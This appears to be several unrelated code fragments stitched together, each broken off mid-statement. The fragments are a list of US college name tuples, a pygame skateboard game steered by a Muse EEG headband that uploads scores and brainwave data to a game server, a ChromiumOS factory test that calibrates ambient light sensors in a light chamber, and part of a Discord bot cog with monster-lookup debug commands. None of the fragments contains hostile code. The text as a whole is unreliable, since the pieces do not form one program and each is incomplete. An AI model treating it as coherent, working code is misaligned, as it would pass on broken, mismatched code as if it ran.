("Sharps Academy of Hair Styling","Sharps Academy of Hair Styling"),
("Shasta Bible College and Graduate School","Shasta Bible College and Graduate School"),
("Shasta College","Shasta College"),
("Shasta School of Cosmetology","Shasta School of Cosmetology"),
("Shaw University","Shaw University"),
("Shawnee Beauty College","Shawnee Beauty College"),
("Shawnee Community College","Shawnee Community College"),
("Shawnee State University","Shawnee State University"),
("Shawsheen Valley Regional Vocational Technical School","Shawsheen Valley Regional Vocational Technical School"),
("Shear Academy","Shear Academy"),
("Shear Ego International School of Hair Design","Shear Ego International School of Hair Design"),
("Shear Excellence Hair Academy","Shear Excellence Hair Academy"),
("Shear Finesse Hairstyling Academy","Shear Finesse Hairstyling Academy"),
("Shear Learning Academy of Cosmetology","Shear Learning Academy of Cosmetology"),
("Shelton State Community College","Shelton State Community College"),
("Shenandoah University","Shenandoah University"),
("Shepherd University","Shepherd University"),
("Shepherds College","Shepherds College"),
("Shepherds Theological Seminary","Shepherds Theological Seminary"),
("Sheridan College","Sheridan College"),
("Sheridan Technical Center","Sheridan Technical Center"),
("Sherman | |
import pygame, random, sys, os, time, math
import numpy as np
from pygame.locals import *
import _thread as thread
import argparse
import multiprocessing # for processing osc stream
from pythonosc import dispatcher as dsp
from pythonosc import osc_server
from pythonosc import udp_client
import urllib.request
import json
import io
import threading
from urllib import parse
fullscreen = True
hasOscRunning = False
event = multiprocessing.Event()
scale = 2
WINDOWWIDTH = int(450 * scale)
WINDOWHEIGHT = int(800 * scale)
TEXTCOLOR = (255, 255, 255)
BACKGROUNDCOLOR = (0, 0, 0)
MASKCOLOR = (0, 0, 0, 180)
WHITECOLOR = (255, 255, 255)
FPS = 60
BADDIEMINSIZE = 10
BADDIEMAXSIZE = 40
BADDIESPEED = 8
MINADDNEWBADDIERATE = 107
MAXADDNEWBADDIERATE = 87
MINADDNEWSTARRATE = 20
MAXADDNEWSTARRATE = 10
INITPLAYERMOVERATE = 5
PLAYERMOVERATE = 5
GAMEDURATION = 60 # game duration
IMAGE_WIDTH = 45
WHOLE_IMAGE_WIDTH = 60
scale = 1
count=3
# for muse tracking
playerRect = None
gameParams = None
oscProcess = None
concenList = []
MINY = -0.5
MAXY = 1
connectUser = None
clientId = None
returnCallback = None
PLAYER_MIN_X = int(55 * scale)
PLAYER_MAX_X = WINDOWWIDTH - PLAYER_MIN_X
min_x = 120
max_x = WINDOWWIDTH - 35
x_data = list(range(min_x, max_x, int((max_x-min_x)/IMAGE_WIDTH)))
ALL_DATA = []
def concen_handler(unused_addr, args, value):
if oscProcess is None:
return
#speed = (1-value) * 30
#speed = max(value, 1) * 30
value = value + 2
value = min(value, 4)
value = max(value, 0)
value = value / 4
speed = value * 20
# update beta values
beta = args[0]['beta']
beta.insert(len(beta), value)
beta.remove(beta[0])
args[0]['beta'] = beta
# calculate speed
speed = min(speed, 30)
speed = max(speed, 10)
args[0]['speed'] = speed
args[0]['concen'] = value * 100
event.set()
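# Worked example of the mapping above (added comment, not in the original): an
# incoming band value of 0.0 shifts to 2, clamps to [0, 4], normalizes to 0.5 and
# gives speed 0.5 * 20 = 10; a value of 2.0 normalizes to 1.0 and gives speed 20.
# The final clamps keep 'speed' within [10, 30], and 'concen' is the normalized
# value scaled to a 0-100 range.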
def acc_handler(unused_addr, args, x, y, z):
# normalize y
global WINDOWWIDTH, playerRect
rate = (y - MINY) / (MAXY - MINY)
if rate > 1:
rate = 1
if rate < 0:
rate = 0
x = WINDOWWIDTH * rate + 30
args[0]['left'] = PLAYER_MIN_X + x
event.set()
def start_osc(ip, port, info):
global hasOscRunning
time.sleep(5)
dispatcher = dsp.Dispatcher()
#dispatcher.map("/muse/algorithm/concentration", concen_handler, info)
dispatcher.map("/muse/elements/delta_absolute", concen_handler, info)
dispatcher.map("/muse/acc", acc_handler, info)
server = osc_server.ThreadingOSCUDPServer(
(ip, port), dispatcher)
print("Serving on {}".format(server.server_address))
hasOscRunning = True
server.serve_forever()
def terminate():
global oscProcess, clientId, connectUser, returnCallback, count
if connectUser:
response = urllib.request.urlopen('https://forrestlin.cn/games/closeConnection/%s/%s'%(clientId, connectUser['userId']))
res = response.read().decode('utf-8')
resJson = json.loads(res)
if not resJson['success']:
print('Failed to close connection, reason: %s'%resJson['errMsg'])
else:
print('Succeed to close connection')
if oscProcess is not None:
oscProcess.terminate()
oscProcess = None
pygame.quit()
count = 3
# go back to the startup page
if returnCallback:
returnCallback()
else:
sys.exit()
def sampleAllData():
global ALL_DATA
if len(ALL_DATA) < WHOLE_IMAGE_WIDTH:
return
step = int(len(ALL_DATA) / WHOLE_IMAGE_WIDTH)
data = []
for i in range(0, len(ALL_DATA), step):
if len(data) >= WHOLE_IMAGE_WIDTH:
break
data.append(ALL_DATA[int(i)])
ALL_DATA = data
def waitForPlayerToPressKey():
while True:
for event in pygame.event.get():
if event.type == QUIT:
terminate()
if event.type == KEYDOWN:
if event.key == K_ESCAPE: #escape quits
terminate()
return
def playerHasHitBaddie(playerRect, baddies):
for b in baddies:
if playerRect.colliderect(b['rect']):
return True
return False
def playerHasHitStar(playerRect, stars):
for s in stars:
if playerRect.colliderect(s['rect']):
stars.remove(s)
return True
return False
def drawText(text, font, surface, x, y, textColor=TEXTCOLOR):
textobj = font.render(text, 1, textColor)
textrect = textobj.get_rect()
textrect.topleft = (x, y)
surface.blit(textobj, textrect)
def uploadScore(score, concenList):
global clientId, connectUser, ALL_DATA
if connectUser == None:
return
waves = ALL_DATA
waves = [max(i , 0.05) * 10 for i in waves]
avgCon = 80
if len(concenList) > 0:
avgCon = sum(concenList) / len(concenList)
avgCon = min(avgCon, 100)
data = {'clientId': clientId, 'userId': connectUser['userId'], 'score': score, 'concen': avgCon, 'waves': ','.join(map(str, waves))}
data = parse.urlencode(data).encode('utf-8')
if clientId is not None and connectUser is not None:
response = urllib.request.urlopen('https://forrestlin.cn/games/finishGame', data=data)
res = response.read().decode('utf-8')
resJson = json.loads(res)
if not resJson['success']:
print('Failed to upload score, reason: %s'%resJson['errMsg'])
else:
print('Succeed to upload score')
def drawLines(surface, x_data, y_data):
global ALL_DATA
max_y = 36
points = []
ALL_DATA.append(y_data[-1])
r = len(x_data) if len(y_data) > len(x_data) else len(y_data)
for i in range(r):
y_data[i] = max_y * (1-y_data[i])
points.append((x_data[i], y_data[i]))
if len(points) > 0:
linerect = pygame.draw.aalines(surface, (255, 255, 255), False, points, 5)
linerect.topleft = (0, 0)
pygame.display.flip()
def drawWholeLines(surface, baseline):
global gameParams, WINDOWHEIGHT, ALL_DATA
points = []
min_x = int((WINDOWWIDTH - 313) / 2 + 20)
max_x = int(WINDOWWIDTH - (WINDOWWIDTH - 313) / 2 - 20)
waves = [0.5]
waves.extend(ALL_DATA)
x_data = list(range(min_x, max_x, int((max_x-min_x)/WHOLE_IMAGE_WIDTH)))
r = min(len(x_data), len(waves))
for i in range(r):
if waves[i] > 1:
print("illegal wave %.2f"%waves[i])
waves[i] = min(1, waves[i])
waves[i] = max(0, waves[i])
points.append((x_data[i], baseline + (waves[i]) * 100))
if len(points) > 0:
linerect = pygame.draw.aalines(surface, (255, 255, 255), False, points, 5)
linerect.topleft = (0, 0)
pygame.display.flip()
def doCounting(windowSurface, seconds):
global fullscreen
clock = pygame.time.Clock()
counter, text = seconds, str(seconds).rjust(3)
num_font = pygame.font.Font("./fonts/TTTGB-Medium.ttf", 120)
appleTipsFont = pygame.font.Font('./fonts/PingFang-Jian-ChangGuiTi-2.ttf', 30)
game_explain = pygame.image.load('image/game_explaination.png')
game_explain = pygame.transform.scale(game_explain, (280, 115))
pygame.time.set_timer(pygame.USEREVENT, 1000)
while True:
for e in pygame.event.get():
if e.type == pygame.USEREVENT:
counter -= 1
text = str(counter).rjust(3) if counter > 0 else "begin!"
if e.type == QUIT:
terminate()
if e.type == KEYDOWN:
if e.key == K_ESCAPE: #escape quits
terminate()
if e.key==ord('f'):
fullscreen=not fullscreen
if fullscreen:
windowSurface=pygame.display.set_mode((WINDOWWIDTH, WINDOWHEIGHT), pygame.FULLSCREEN)
else:
windowSurface = pygame.display.set_mode((WINDOWWIDTH, WINDOWHEIGHT), RESIZABLE, 32)
if counter <= 0:
break
else:
windowSurface.fill((0, 0, 0))
drawText(text, num_font, windowSurface, (WINDOWWIDTH / 2) - 145, (WINDOWHEIGHT / 3))
drawText('左右摆动头部控制滑板', appleTipsFont, windowSurface, (WINDOWWIDTH / 2) - 150, (WINDOWHEIGHT / 2))
windowSurface.blit(game_explain, (WINDOWWIDTH / 2 - 150, WINDOWHEIGHT / 2 + 60))
windowSurface.blit(num_font.render(text, True, (0, 0, 0)), (32, 48))
pygame.display.flip()
clock.tick(60)
continue
break
def game():
global playerRect, gameParams, count, connectUser, clientId, concenList, WINDOWHEIGHT, WINDOWWIDTH, IMAGE_WIDTH, max_x, x_data, fullscreen
starttime = None # for timing
endtime = None
# set up pygame, the window, and the mouse cursor
pygame.init()
mainClock = pygame.time.Clock()
displayInfo = pygame.display.Info()
# if displayInfo.current_h / WINDOWHEIGHT > displayInfo.current_w / WINDOWWIDTH:
# # fit width
# scale = displayInfo.current_w / WINDOWWIDTH
# WINDOWHEIGHT = int(scale * WINDOWHEIGHT)
# WINDOWWIDTH = displayInfo.current_w
# else:
# # fit height
# scale = displayInfo.current_h / WINDOWHEIGHT
# WINDOWWIDTH = int(scale * WINDOWWIDTH)
# WINDOWHEIGHT = displayInfo.current_h
max_x = WINDOWWIDTH - 35
x_data = list(range(min_x, max_x, int((max_x-min_x)/IMAGE_WIDTH)))
#windowSurface = pygame.display.set_mode((WINDOWWIDTH, WINDOWHEIGHT), pygame.FULLSCREEN)
windowSurface = pygame.display.set_mode((WINDOWWIDTH, WINDOWHEIGHT), RESIZABLE, 32)
pygame.display.set_caption('意念滑板赛')
pygame.mouse.set_visible(False)
# fonts
font = pygame.font.Font("./fonts/TTTGB-Medium.ttf", 20)
appleFont = pygame.font.Font("./fonts/TTTGB-Medium.ttf", 28)
appleTipsFont = pygame.font.Font('./fonts/PingFang-Jian-ChangGuiTi-2.ttf', 14)
appleTitleFont = pygame.font.Font('./fonts/PingFang-Jian-ChangGuiTi-2.ttf', 16)
scoreFont = pygame.font.Font('./fonts/TTTGB-Medium.ttf', 12)
# sounds
pygame.mixer.init()
gameOverSound = pygame.mixer.Sound('music/gameover.wav')
pygame.mixer.music.load('music/technicolordreams.mp3')
laugh = pygame.mixer.Sound('music/laugh.wav')
reward = pygame.mixer.Sound('music/reward.wav')
# images
playerImage = pygame.image.load('image/skateboard.png')
playerImage = pygame.transform.scale(playerImage, (int(60 * scale), int(70 * scale)))
car2 = pygame.image.load('image/shit.png')
# car3 = pygame.image.load('image/shoe2.png')
# load the player avatar and nickname
avatarImg, nickName = None, "匿名玩家"
if connectUser:
print(connectUser)
avatarUrl = connectUser['avatar']
avatarStr = urllib.request.urlopen(avatarUrl).read()
avatarImg = pygame.image.load(io.BytesIO(avatarStr))
nickName = connectUser['nickname']
else:
avatarImg = pygame.image.load('image/user_unlogin.png')
avatarImg = pygame.transform.scale(avatarImg, (50, 50))
playerRect = playerImage.get_rect()
shoe1 = pygame.image.load('image/shoe1.png')
shoe2 = pygame.image.load('image/shoe2.png')
barriers = [car2]
shoes = [shoe1, shoe2]
background = pygame.image.load('image/game_bg.jpg')
wavebg = pygame.image.load('image/wave_bg.png')
wavebg = pygame.transform.scale(wavebg, (WINDOWWIDTH, 63))
leftupBg = pygame.image.load('image/leftup_bg.png')
leftupBg = pygame.transform.scale(leftupBg, (119, 63))
rightupBg = pygame.image.load('image/rightup_bg.png')
rightupBg = pygame.transform.scale(rightupBg, (62, 63))
scoreBg = pygame.image.load('image/score_bg.png')
scoreBg = pygame.transform.scale(scoreBg, (313, 431))
scoreShoe = pygame.transform.scale(shoe2, (50, 50))
# "Start" screen
#drawText('Press any key', font, windowSurface, (WINDOWWIDTH / 3) - 30, (WINDOWHEIGHT / 3))
#drawText('And Enjoy', font, windowSurface, (WINDOWWIDTH / 3), (WINDOWHEIGHT / 3)+30)
#drawRect(windowSurface)
#pygame.display.update()
starttime = int(time.time())
endtime = int(starttime + GAMEDURATION)
#waitForPlayerToPressKey()
zero=0
if not os.path.exists("data/save.dat"):
f=open("data/save.dat",'w')
f.write(str(zero))
f.close()
v=open("data/save.dat",'r')
topScore = int(v.readline())
v.close()
pygame.mixer.music.play(-1, 0.0)
windowSurface = pygame.display.set_mode((WINDOWWIDTH, WINDOWHEIGHT), pygame.FULLSCREEN)
doCounting(windowSurface, 5)
while (count>0):
# start of the game
baddies = []
stars = []
walls = []
score = 0
playerRect.topleft = ((WINDOWWIDTH - playerRect.width) / 2, WINDOWHEIGHT - playerRect.height)
moveLeft = moveRight = moveUp = moveDown = False
reverseCheat = slowCheat = False
baddieAddCounter = 0
starAddCounter = 0
while True: # the game loop
for event in pygame.event.get():
if event.type == QUIT:
terminate()
if event.type == KEYDOWN:
if event.key == ord('z'):
reverseCheat = True
if event.key == ord('x'):
slowCheat = True
if event.key == K_LEFT or event.key == ord('a'):
moveRight = False
moveLeft = True
if event.key == K_RIGHT or event.key == ord('d'):
moveLeft = False
moveRight = True
if event.key == K_UP or event.key == ord('w'):
moveDown = False
moveUp = True
if event.key == K_DOWN or | |
# Repository: arccode/factory
# Copyright 2017 The Chromium OS Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
# pylint: disable=line-too-long
"""Calibration test for light sensor (a chamber is needed).
Description
-----------
This is a station-based test which calibrates light sensors.
The test controls a light chamber to switch light intensity between different
light presets and reads the value from the light sensor of a DUT.
The calibration method is linear regression. The test samples multiple
data points (e.g., LUX1, LUX2), fits a new linear equation to them, and checks
the fit against the validating data point (e.g., LUX3). The calibrated
coefficients (scale factor and bias) will be saved to the VPD.
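Conceptually the fit can be sketched as follows (illustrative code only, not the
production implementation; it assumes the regression maps the mean ALS readings
sampled at each preset to the reference lux values, and the numbers are
placeholders)::

  import numpy as np
  luxs = np.array([40.0, 217.0])       # reference lux presets from the config
  readings = np.array([38.5, 210.2])   # mean ALS readings at each preset (placeholders)
  # Solve readings * scale_factor + bias ~= luxs in the least-squares sense.
  A = np.vstack([readings, np.ones_like(readings)]).T
  scale_factor, bias = np.linalg.lstsq(A, luxs, rcond=None)[0]
  # scale_factor and bias are the calibrated coefficients described above.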
The default chamber connection driver is PL2303 over RS232. You can specify a
different driver via ``chamber_conn_params``. You also need to provide
``chamber_cmd``, the commands with which a station can control the light chamber.
Besides the arguments, there are additional settings in
light_sensor_calibration.json. For example::
{
"version": "v0.01",
"light_seq": ["LUX1", "LUX2", "LUX3"],
"n_samples": 5,
"read_delay": 2.0,
"light_delay": 6.0,
"luxs": [40, 217],
"validating_light": "LUX3",
"validating_lux": 316,
"validating_err_limit": 0.2,
"force_light_init": false
}
The most important entries are ``luxs`` and ``validating_lux``. They are the
preset illuminance values of the light chamber fixture. You need a lux meter
to measure the preset light settings of the light chamber fixture to get
these values. After you have these values, don't forget to update the runtime
configuration by calling
``cros.factory.utils.config_utils.SaveRuntimeConfig('light_sensor_calibration', new_config)``
so that the test uses the correct preset light information. Many things can
shift the preset light values of the chamber, such as an unstable electrical
environment or a broken bulb in the light chamber.
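For instance, after re-measuring the chamber with a lux meter, updating the
runtime configuration could look like the following sketch (the numbers are
placeholders, not real measurements)::

  from cros.factory.utils import config_utils
  new_config = {
      "version": "v0.02",
      "light_seq": ["LUX1", "LUX2", "LUX3"],
      "n_samples": 5,
      "read_delay": 2.0,
      "light_delay": 6.0,
      "luxs": [42, 225],          # re-measured preset lux values (placeholders)
      "validating_light": "LUX3",
      "validating_lux": 320,      # re-measured validating lux (placeholder)
      "validating_err_limit": 0.2,
      "force_light_init": False
  }
  config_utils.SaveRuntimeConfig('light_sensor_calibration', new_config)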
Test Procedure
--------------
This is an automated test. Before you start the test, prepare the
physical setup and calibrate the light chamber itself by a lux meter:
1. Connects the station and the DUT.
2. Connects the station and the light chamber.
3. Press start test.
4. After finishing the test, disconnects the station and the DUT.
Dependency
----------
- A light chamber with at least three luminance settings.
Examples
--------
To automatically calibrate the light_sensor with the given ``chamber_cmd``, add
this into test list::
{
"pytest_name": "light_sensor_calibration",
"args": {
"control_chamber": true,
"assume_chamber_connected": true,
"chamber_cmd": {
"LUX1": [
[
"LUX1_ON",
"LUX1_READY"
]
],
"LUX2": [
[
"LUX2_ON",
"LUX2_READY"
]
],
"LUX3": [
[
"LUX3_ON",
"LUX3_READY"
]
],
"OFF": [
[
"OFF",
"OFF_READY"
]
]
}
}
}
To debug and use a mocked light chamber::
{
"pytest_name": "light_sensor_calibration",
"args": {
"control_chamber": true,
"mock_mode": true
}
}
To manually switch chamber light::
{
"pytest_name": "light_sensor_calibration",
"args": {
"control_chamber": false
}
}
Troubleshooting
----------------
If you see an error related to loading the configuration file:
- The runtime config format is probably incorrect.
If you see an error connecting to the light chamber:
1. Make sure the chamber and the station are connected.
2. Make sure the dongle is the correct one. If you are not using a dongle with
the PL2303 driver, you need to provide a matching ``chamber_conn_params``.
If the calibrated coefficients look skewed:
1. The light chamber probably has not been calibrated recently.
"""
from collections import namedtuple
import json
import logging
import time
import numpy as np
from cros.factory.device import ambient_light_sensor
from cros.factory.device import device_utils
from cros.factory.test import session
from cros.factory.test.fixture import fixture_connection
from cros.factory.test.fixture.light_sensor import light_chamber
from cros.factory.test import i18n
from cros.factory.test.i18n import _
from cros.factory.test import test_case
from cros.factory.test.utils import kbd_leds
from cros.factory.test.utils import media_utils
from cros.factory.testlog import testlog
from cros.factory.utils.arg_utils import Arg
from cros.factory.utils import config_utils
from cros.factory.utils import type_utils
# LED pattern.
LED_PATTERN = ((kbd_leds.LED_NUM | kbd_leds.LED_CAP, 0.05), (0, 0.05))
# Data structures.
EventType = type_utils.Enum(['START_TEST', 'EXIT_TEST'])
FIXTURE_STATUS = type_utils.Enum(['CONNECTED', 'DISCONNECTED'])
InternalEvent = namedtuple('InternalEvent', 'event_type aux_data')
FAIL_CONFIG = 'ConfigError' # Config file error.
FAIL_SN = 'SerialNumber' # Missing camera or bad serial number.
FAIL_CHAMBER_ERROR = 'ChamberError' # Chamber connection error.
FAIL_ALS_NOT_FOUND = 'AlsNotFound' # ALS not found.
FAIL_ALS_CLEAN = 'AlsClean' # ALS coefficient clean up error.
FAIL_ALS_SAMPLE = 'AlsSample' # ALS sampling error.
FAIL_ALS_ORDER = 'AlsOrder' # ALS order error.
FAIL_ALS_CALIB = 'AlsCalibration' # ALS calibration error.
FAIL_ALS_CALC = 'AlsCalculation' # ALS coefficient calculation error.
FAIL_ALS_VALID = 'AlsValidating' # ALS validating error.
FAIL_ALS_VPD = 'AlsVPD' # ALS write VPD error
FAIL_ALS_CONTROLLER = 'ALSController' # ALS controller error.
FAIL_UNKNOWN = 'UnknownError' # Unknown error
# ALS mock mode.
ALS_MOCK_VALUE = 10
# Chamber connection parameters
CHAMBER_CONN_PARAMS_DEFAULT = {
'driver': 'pl2303',
'serial_delay': 0,
'serial_params': {
'baudrate': 9600,
'bytesize': 8,
'parity': 'N',
'stopbits': 1,
'xonxoff': False,
'rtscts': False,
'timeout': None
},
'response_delay': 2
}
class ALSFixture(test_case.TestCase):
"""ALS fixture main class."""
ARGS = [
# chamber connection
Arg('control_chamber', bool, 'Whether or not to control the chart in the '
'light chamber.', default=False),
Arg('assume_chamber_connected', bool, 'Assume chamber is connected on '
'test startup. This is useful when running fixture-based testing. '
"The OP won't have to reconnect the fixture everytime.",
default=True),
Arg('chamber_conn_params', (dict, str), 'Chamber connection parameters, '
"either a dict, defaults to None", default=None),
Arg('chamber_cmd', dict, 'A dict for name of lightning to a '
'[cmd, cmd_response].'),
Arg('chamber_n_retries', int, 'Number of retries when connecting.',
default=10),
Arg('chamber_retry_delay', int, 'Delay between connection retries.',
default=2),
# test environment
Arg('mock_mode', bool, 'Mock mode allows testing without a fixture.',
default=False),
Arg('config_dict', dict, 'The config dictionary. '
'If None, then the config is loaded by config_utils.LoadConfig().',
default=None),
Arg('keep_raw_logs', bool,
'Whether to attach the log by Testlog',
default=True),
]
def setUp(self):
self.dut = device_utils.CreateDUTInterface()
try:
self.als_controller = self.dut.ambient_light_sensor.GetController()
except Exception as e:
self._LogFailure(FAIL_ALS_NOT_FOUND,
'Error getting ALS controller: %s' % str(e))
raise
# Loads config.
try:
self.config = self.args.config_dict or config_utils.LoadConfig()
if self.config is None:
raise ValueError('No available configuration.')
self._LogConfig()
except Exception as e:
logging.exception('Error logging config file: %s', str(e))
raise
self.read_delay = self.config['read_delay']
self.n_samples = self.config['n_samples']
try:
if self.args.chamber_conn_params is None:
chamber_conn_params = CHAMBER_CONN_PARAMS_DEFAULT
else:
chamber_conn_params = self.args.chamber_conn_params
self.fixture_conn = None
if self.args.control_chamber:
if self.args.mock_mode:
script = {k.strip(): v.strip()
for k, v in sum(self.args.chamber_cmd.values(), [])}
self.fixture_conn = fixture_connection.MockFixtureConnection(script)
else:
self.fixture_conn = fixture_connection.SerialFixtureConnection(
**chamber_conn_params)
self.chamber = light_chamber.LightChamber(
fixture_conn=self.fixture_conn, fixture_cmd=self.args.chamber_cmd)
except Exception as e:
self._LogFailure(FAIL_CHAMBER_ERROR,
'Error setting up ALS chamber: %s' % str(e))
self.all_sampled_lux = [] # mean of sampled lux for each light
self.scale_factor = None # value of calibrated scale factor
self.bias = None # value of calibrated bias
self.light_index = -1 # ALS test stage
self.monitor = media_utils.MediaMonitor('usb-serial', None)
self.ui.SetTitle(_('ALS Sensor Calibration'))
# Group checker for Testlog.
self.group_checker = testlog.GroupParam(
'lux_value', ['name', 'value', 'elapsed'])
def _Log(self, text):
"""Custom log function to log."""
logging.info(text)
session.console.info(text)
def _LogArgument(self, key, value, description):
testlog.AddArgument(key, value, description)
self._Log("%s=%s" % (key, value))
def _LogConfig(self):
if self.args.keep_raw_logs:
testlog.AttachContent(
content=json.dumps(self.config),
name='light_sensor_calibration_config.json',
description='json of light sensor calibration config')
def _LogFailure(self, code, details):
testlog.AddFailure(code, details)
message = 'FAIL %r: %r' % (code, details)
logging.exception(message)
session.console.info(message)
def _ALSTest(self):
try:
self._ShowTestStatus(_('Cleaning up calibration values'))
if not self.args.mock_mode:
self.als_controller.CleanUpCalibrationValues()
except Exception as e:
self._LogFailure(FAIL_ALS_CLEAN, 'Error cleaning up calibration values:'
' %s' % str(e))
raise
while True:
try:
if not self._SwitchToNextLight():
break
light_name = self.config['light_seq'][self.light_index]
self._ShowTestStatus(
i18n.StringFormat(_('Sampling {name}'), name=light_name))
self._SampleALS(light_name)
except Exception as e:
self._LogFailure(FAIL_ALS_SAMPLE, 'Error sampling lighting %d %s: %s' %
(self.light_index, light_name, str(e)))
raise
try:
self._ShowTestStatus(_('Checking ALS ordering'))
self._CheckALSOrdering()
except Exception as e:
self._LogFailure(FAIL_ALS_ORDER,
'Error checking als ordering: %s' % str(e))
raise
try:
self._ShowTestStatus(_('Calculating calibration coefficients'))
self._CalculateCalibCoef()
except Exception as e:
self._LogFailure(FAIL_ALS_CALC, 'Error calculating calibration'
' coefficient: %s' % str(e))
raise
try:
self._ShowTestStatus(_('Saving calibration coefficients to VPD'))
self._SaveCalibCoefToVPD()
except Exception as e:
self._LogFailure(FAIL_ALS_VPD, 'Error setting calibration'
' coefficient to VPD: %s' % str(e))
raise
try:
self._ShowTestStatus(_('Validating ALS'))
light_name = self.config['validating_light']
self._SwitchLight(light_name)
self._ValidateALS(light_name)
except Exception as e:
self._LogFailure(FAIL_ALS_VALID,
'Error validating calibrated ALS: %s' % str(e))
raise
def _OnU2SInsertion(self, device):
del device # unused
cnt = 0
while cnt < self.args.chamber_n_retries:
try:
self._SetupFixture()
self._SetFixtureStatus(FIXTURE_STATUS.CONNECTED)
return
except Exception:
cnt += 1
self._SetFixtureStatus(FIXTURE_STATUS.DISCONNECTED)
self.Sleep(self.args.chamber_retry_delay)
raise light_chamber.LightChamberError('Error connecting to light chamber')
def _OnU2SRemoval(self, device):
del device # unused
self._SetFixtureStatus(FIXTURE_STATUS.DISCONNECTED)
def _SetFixtureStatus(self, status):
if status == FIXTURE_STATUS.CONNECTED:
style = 'color-good'
label = _('Fixture Connected')
elif status == FIXTURE_STATUS.DISCONNECTED:
style = 'color-bad'
label = _('Fixture Disconnected')
else:
raise ValueError('Unknown fixture status %s' % status)
self.ui.SetHTML(
['<span class="%s">' % style, label, '</span>'], id='fixture-status')
def _SetupFixture(self):
"""Initialize the communication with the fixture."""
try:
self.chamber.Connect()
except Exception as e:
self._LogFailure(FAIL_CHAMBER_ERROR, 'Error initializing the ALS fixture:'
' %s' % str(e))
raise
self._Log('Test fixture successfully initialized.')
def _SwitchLight(self, light):
self._Log("Switching to lighting %s." % light)
self._ShowTestStatus(
i18n.StringFormat(_('Switching to lighting {name}'), name=light))
try:
self.chamber.SetLight(light)
| |
emoji_servers = settings.emojiServers()
await ctx.send(box("\n".join(str(s) for s in emoji_servers)))
@padinfo.command()
@checks.is_owner()
async def setvoicepath(self, ctx, *, path=''):
"""Set path to the voice direcory"""
settings.setVoiceDir(path)
await ctx.tick()
def get_emojis(self):
server_ids = [int(sid) for sid in settings.emojiServers()]
return [e for g in self.bot.guilds if g.id in server_ids for e in g.emojis]
@staticmethod
async def send_id_failure_message(ctx, query: str):
await ctx.send("Sorry, your query {0} didn't match any results :(\n"
"See <{2}> for "
"documentation on `{1.prefix}id`! You can also run `{1.prefix}idhelp <monster id>` to get "
"help with querying a specific monster.".format(inline(query), ctx, IDGUIDE))
@commands.command(aliases=["iddebug", "dbid", "iddb"])
async def debugid(self, ctx, server: Optional[Server] = Server.COMBINED, *, query):
"""Get helpful id information about a monster"""
dgcog = await self.get_dgcog()
mon = await dgcog.find_monster(query, ctx.author.id)
if mon is None:
await ctx.send(box("Your query didn't match any monsters."))
return
base_monster = dgcog.database.graph.get_base_monster(mon)
mods = dgcog.indexes[server].modifiers[mon]
manual_modifiers = dgcog.indexes[server].manual_prefixes[mon.monster_id]
EVOANDTYPE = dgcog.token_maps.EVO_TOKENS.union(dgcog.token_maps.TYPE_TOKENS)
ret = (f"[{mon.monster_id}] {mon.name_en}\n"
f"Base: [{base_monster.monster_id}] {base_monster.name_en}\n"
f"Series: {mon.series.name_en} ({mon.series_id}, {mon.series.series_type})\n\n"
f"[Name Tokens] {' '.join(sorted(t for t, ms in dgcog.indexes[server].name_tokens.items() if mon in ms))}\n"
f"[Fluff Tokens] {' '.join(sorted(t for t, ms in dgcog.indexes[server].fluff_tokens.items() if mon in ms))}\n\n"
f"[Manual Tokens]\n"
f" Treenames: {' '.join(sorted(t for t, ms in dgcog.indexes[server].manual_tree.items() if mon in ms))}\n"
f" Nicknames: {' '.join(sorted(t for t, ms in dgcog.indexes[server].manual_nick.items() if mon in ms))}\n\n"
f"[Modifier Tokens]\n"
f" Attribute: {' '.join(sorted(t for t in mods if t in dgcog.token_maps.COLOR_TOKENS))}\n"
f" Awakening: {' '.join(sorted(t for t in mods if t in dgcog.token_maps.AWAKENING_TOKENS))}\n"
f" Evo & Type: {' '.join(sorted(t for t in mods if t in EVOANDTYPE))}\n"
f" Other: {' '.join(sorted(t for t in mods if t not in dgcog.token_maps.OTHER_HIDDEN_TOKENS))}\n"
f"Manually Added: {' '.join(sorted(manual_modifiers))}\n")
for page in pagify(ret):
await ctx.send(box(page))
@commands.command()
async def debugiddist(self, ctx, s1, s2):
"""Find the distance between two queries.
For name tokens, the full word goes second as name token matching is not commutitive
"""
dgcog = await self.get_dgcog()
dist = dgcog.mon_finder.calc_ratio_modifier(s1, s2)
dist2 = dgcog.mon_finder.calc_ratio_name(s1, s2)
yes = '\N{WHITE HEAVY CHECK MARK}'
no = '\N{CROSS MARK}'
await ctx.send(f"Printing info for {inline(s1)}, {inline(s2)}\n" +
box(f"Jaro-Winkler Distance: {round(dist, 4)}\n"
f"Name Matching Distance: {round(dist2, 4)}\n"
f"Modifier token threshold: {dgcog.mon_finder.MODIFIER_JW_DISTANCE} "
f"{yes if dist >= dgcog.mon_finder.MODIFIER_JW_DISTANCE else no}\n"
f"Name token threshold: {dgcog.mon_finder.TOKEN_JW_DISTANCE} "
f"{yes if dist2 >= dgcog.mon_finder.TOKEN_JW_DISTANCE else no}"))
@commands.command(aliases=['helpid'])
async def idhelp(self, ctx, *, query=""):
"""Get help with an id query"""
await ctx.send(
"See <{0}> for documentation on `{1.prefix}id`!"
" Use `{1.prefix}idmeaning` to query the meaning of any modifier token."
" Remember that other than `equip`, modifiers must be at the start of the query."
"".format(IDGUIDE, ctx))
if query:
await self.debugid(ctx, query=query)
@commands.command()
async def exportmodifiers(self, ctx, server: LiteralConverter["COMBINED", "NA"] = "COMBINED"):
server = Server(server)
DGCOG = await self.get_dgcog()
maps = DGCOG.token_maps
awakenings = {a.awoken_skill_id: a for a in DGCOG.database.get_all_awoken_skills()}
series = {s.series_id: s for s in DGCOG.database.get_all_series()}
ret = ("Jump to:\n\n"
"* [Types](#types)\n"
"* [Evolutions](#evolutions)\n"
"* [Misc](#misc)\n"
"* [Awakenings](#awakenings)\n"
"* [Series](#series)\n"
"* [Attributes](#attributes)\n\n\n\n")
etable = [(k.value, ", ".join(map(inline, v))) for k, v in maps.EVO_MAP.items()]
ret += "\n\n### Evolutions\n\n" + tabulate(etable, headers=["Meaning", "Tokens"], tablefmt="github")
ttable = [(k.name, ", ".join(map(inline, v))) for k, v in maps.TYPE_MAP.items()]
ret += "\n\n### Types\n\n" + tabulate(ttable, headers=["Meaning", "Tokens"], tablefmt="github")
mtable = [(k.value, ", ".join(map(inline, v))) for k, v in maps.MISC_MAP.items()]
ret += "\n\n### Misc\n\n" + tabulate(mtable, headers=["Meaning", "Tokens"], tablefmt="github")
